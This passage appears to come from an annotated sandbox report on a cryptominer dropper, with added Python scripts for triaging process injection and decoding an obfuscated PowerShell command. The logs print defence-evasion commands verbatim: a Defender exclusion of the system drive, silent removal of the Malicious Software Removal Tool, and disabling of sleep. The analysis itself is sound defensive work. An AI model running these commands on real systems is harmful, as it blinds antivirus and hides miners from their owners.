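        "source": image_name(m["src"]),
        "target": image_name(m["dst"]),
        "target_raw": m["dst"],
        "base": int(m["base"], 16),
        "value": (m["val"] or "").upper(),   # leading bytes as hex, '' if not reported
    }


def parse_report(text):
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def summarize(events):
    """Per injecting image: write count, PE-image (MZ) write count, distinct targets."""
    out = {}
    for e in events:
        s = out.setdefault(e["source"], {"writes": 0, "pe_writes": 0, "targets": set()})
        s["writes"] += 1
        if e["value"].startswith("4D5A"):      # 'MZ': a full PE image is being written
            s["pe_writes"] += 1
        if e["target"]:
            s["targets"].add(e["target"])
    for s in out.values():
        s["targets"] = sorted(s["targets"])
        s["sensitive_targets"] = sorted(t for t in s["targets"] if t in SENSITIVE)
    return out


def chained_sources(summary):
    """Images that were written into by another process and then wrote into others."""
    all_targets = {t for s in summary.values() for t in s["targets"]}
    return sorted(src for src in summary if src in all_targets)


if __name__ == "__main__":
    summary = summarize(parse_report(SAMPLE))
    for src, s in summary.items():
        print(f"{src}: {s['writes']} writes, {s['pe_writes']} PE images, "
              f"sensitive targets: {s['sensitive_targets']}")
    print("chained injection via:", chained_sources(summary))
```

Run over the full list on this page rather than the sample, the same script turns a few hundred lines into a short answer to the questions an incident responder actually asks: which process is the injector, how many distinct images it touched, whether any of those are security or credential processes, and whether the injected code is spreading further on its own.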
Source: C:\Users\user\Desktop\kx new.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\Desktop\kx new.exe Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\Desktop\kx new.exe Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\kx new.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
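The -EncodedCommand launched by kx new.exe is the clearest defence-evasion step on this page. -EncodedCommand takes base64 of UTF-16LE text, and the original-case string in the first process-creation entry decodes to `<#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>`: the `<# ... #>` block comments are junk inserted between tokens to break naive string matching, and the two exclusions cover the user profile and the entire system drive, so the miners dropped into %TEMP% and anything dialer.exe later writes are never scanned by Defender. One caveat for anyone copying from the report: the lower-cased copy in the Sigma-normalised entry above is no longer valid base64 for this command and will not decode to readable text. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It decodes the argument, rejects case-folded or otherwise altered input, strips the comment obfuscation and flags Defender-preference changes. The lists of weakening parameters and "broad" exclusion targets are the author's own heuristics, not taken from the report.

```python
"""Decode and triage a PowerShell -EncodedCommand argument.

Added example (not code from the sandbox or the sample). ENCODED is the
argument copied verbatim, in its original case, from the process-creation
entry above.
"""
import base64
import re

ENCODED = "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Author's heuristics: Defender preference cmdlets and the parameters that weaken it.
MP_CMDLETS = {"add-mppreference", "set-mppreference"}
WEAKENING_PARAMS = {
    "-exclusionpath", "-exclusionprocess", "-exclusionextension",
    "-disablerealtimemonitoring", "-disablebehaviormonitoring", "-disableioavprotection",
}
# Exclusion targets that amount to turning scanning off for the whole machine.
BROAD_TARGETS = {"$env:systemdrive", "$env:userprofile", "$env:systemroot", "$env:programdata"}


def decode_encoded_command(b64):
    """Base64 -> UTF-16LE text. Raises ValueError if the input was altered.

    A case-folded copy (as log normalisers produce) is still valid base64 but
    decodes to garbage, so a printable-ASCII check is applied. Real-world
    encoded commands may legitimately contain non-ASCII; relax the check for
    those. UnicodeDecodeError and binascii.Error are ValueError subclasses.
    """
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE")
    text = raw.decode("utf-16-le")
    if any(ord(ch) > 0x7E or (ord(ch) < 0x20 and ch not in "\r\n\t") for ch in text):
        raise ValueError("decoded text is not printable ASCII; base64 was probably altered")
    return text


def decode_or_none(b64):
    try:
        return decode_encoded_command(b64)
    except ValueError:
        return None


def normalize(script):
    """Drop <# #> block comments used as token separators and collapse whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def triage(script):
    """Identify Defender-weakening cmdlet usage and the exclusions it adds."""
    cmd = normalize(script)
    tokens = cmd.split()
    cmdlet = next((t for t in tokens if t.lower() in MP_CMDLETS), None)
    params = [t for t in tokens if t.lower() in WEAKENING_PARAMS]
    exclusions = []
    m = re.search(r"-ExclusionPath\s+(?:@\(([^)]*)\)|(\S+))", cmd, re.IGNORECASE)
    if m:
        values = m.group(1) if m.group(1) is not None else m.group(2)
        exclusions = [v.strip().strip("'\"") for v in values.split(",") if v.strip()]
    broad = [x for x in exclusions
             if x.lower() in BROAD_TARGETS or re.fullmatch(r"[A-Za-z]:\\?", x)]
    return {
        "command": cmd,
        "cmdlet": cmdlet,
        "params": params,
        "exclusions": exclusions,
        "broad_exclusions": broad,
        "suspicious": cmdlet is not None and bool(params),
    }


if __name__ == "__main__":
    print(triage(decode_encoded_command(ENCODED)))
    print("case-folded copy decodes:", decode_or_none(ENCODED.lower()) is not None)
```

When triaging a host rather than a report, the same decode-then-normalise step belongs in front of any string match on PowerShell command lines, because the `<#x#>` padding defeats a direct search for "Add-MpPreference -ExclusionPath" in the raw argument.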
Source: C:\Windows\System32\dialer.exe Code function: 45_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140001B54
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Code function: 10_2_000002534CF736F0 cpuid 10_2_000002534CF736F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\dialer.exe Code function: 45_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140001B54
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Code function: 10_2_000002534CF97960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_000002534CF97960

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the counts shown on the matched technique cells; cells without a count are unmatched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API (11); Command and Scripting Interpreter (12); Service Execution (1); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Windows Service (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (1); Process Injection (712); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Install Root Certificate (1); DLL Side-Loading (1); Rootkit (4); Modify Registry (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (712); Hidden Files and Directories (1)
Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (22); Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Credential API Hooking (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph ID: 1585415, Sample: kx new.exe, Startdate: 07/01/2025, Architecture: WINDOWS, Score: 100

Behavior graph, rendered as a process tree (the number after a process name is the count shown on its node; signatures are listed under the process they are attached to):

Start
  Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 13 other signatures
  kx new.exe (3), started
    Dropped: C:\Users\user\AppData\Local\...\xmr new.exe, PE32+
    Dropped: C:\Users\user\AppData\...\Kawpow new.exe, PE32+
    Signatures: Encrypted powershell cmdline option found
    Kawpow new.exe (1), started
      Signatures: Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
      dialer.exe, started
